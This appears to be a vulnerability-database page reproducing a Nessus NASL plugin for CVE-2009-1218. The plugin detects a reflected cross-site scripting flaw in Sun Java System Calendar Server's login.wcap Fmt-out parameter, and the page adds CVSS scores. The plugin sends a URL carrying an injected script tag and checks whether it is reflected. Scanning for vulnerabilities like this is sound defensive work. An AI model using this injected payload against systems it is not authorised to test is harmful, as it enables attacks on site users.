Lucene search

K
nessusThis script is Copyright (C) 2009-2021 Tenable Network Security, Inc.SUN_CALENDAR_SERVER_FMT_OUT_XSS.NASL
HistoryMay 27, 2009 - 12:00 a.m.

Sun Java System Calendar Server login.wcap Fmt-out Parameter XSS

2009-05-2700:00:00
This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.
www.tenable.com
24

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.006

Percentile

79.1%

The version of Sun Java System Calendar Server running on the remote host fails to sanitize input to the β€˜Fmt-out’ parameter of the β€˜login.wcap’ script before using it to generate dynamic HTML output.

An attacker may be able to leverage this to inject arbitrary HTML and script code into a user’s browser to be executed within the security context of the affected site.

Note that this install is also likely to be affected by other vulnerabilities, although Nessus has not checked for them.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if (description)
{
  script_id(38913);
  script_version("1.19");

  script_cve_id("CVE-2009-1218");
  script_bugtraq_id(34152);
  script_xref(name:"Secunia", value:"34528");

  script_name(english:"Sun Java System Calendar Server login.wcap Fmt-out Parameter XSS");
  script_summary(english:"Tries to inject script code into login.wcap");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server uses a script that is affected by a cross-site
scripting vulnerability."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The version of Sun Java System Calendar Server running on the
remote host fails to sanitize input to the 'Fmt-out' parameter of the
'login.wcap' script before using it to generate dynamic HTML output. 

An attacker may be able to leverage this to inject arbitrary HTML and
script code into a user's browser to be executed within the security
context of the affected site. 

Note that this install is also likely to be affected by other
vulnerabilities, although Nessus has not checked for them."
  );
  script_set_attribute(
    attribute:"see_also", 
    value:"http://www.coresecurity.com/content/sun-calendar-express"
  );
  script_set_attribute(
    attribute:"see_also", 
    value:"https://www.securityfocus.com/archive/1/502320/30/0/threaded"
  );
  script_set_attribute(
    attribute:"see_also", 
    value:"https://download.oracle.com/sunalerts/1020321.1.html"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Apply the appropriate patch referenced in the vendor advisory above."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(79);
  script_set_attribute(attribute:"patch_publication_date", value: "2009/03/31");
  script_set_attribute(attribute:"plugin_publication_date", value: "2009/05/27");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 3080, 3443);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");


port = get_http_port(default:3080, embedded: 0, no_xss: 1);


# Make sure we're looking at Calendar Express / Calendar Server.
res = http_get_cache(item:"/", port:port, exit_on_fail: 1);

if (
  "Calendar Express" >!< res &&
  'action="login.wcap"' >!< res
) exit(0);


# Try to exploit the issue.
exploit = string("<script>alert('", SCRIPT_NAME, "')</script>");

url = string(
  "/login.wcap?",
  "calid=&",
  "calname=&",
  "date=&",
  "fmt-out=", urlencode(str:exploit), "&",
  "view=&",
  "locale=&",
  "tzid=&",
  "test=", unixtime(), "&",
  "user=NESSUS&",
  "password=", SCRIPT_NAME
);

res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail: 1);

# There's a problem if we see our exploit in the error message.
if (string(exploit, "&quot is not supported MIME type") >< res[2])
{
  if (report_verbosity > 0)
  {
    set_kb_item(name:'www/'+port+'/XSS', value:TRUE);

    report = string(
      "\n",
      "Nessus was able to exploit the issue using the following URL :\n",
      "\n",
      "  ", build_url(port:port, qs:url), "\n"
    );
    security_warning(port:port, extra:report);
  }
  else security_warning(port);
}

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.006

Percentile

79.1%

Related for SUN_CALENDAR_SERVER_FMT_OUT_XSS.NASL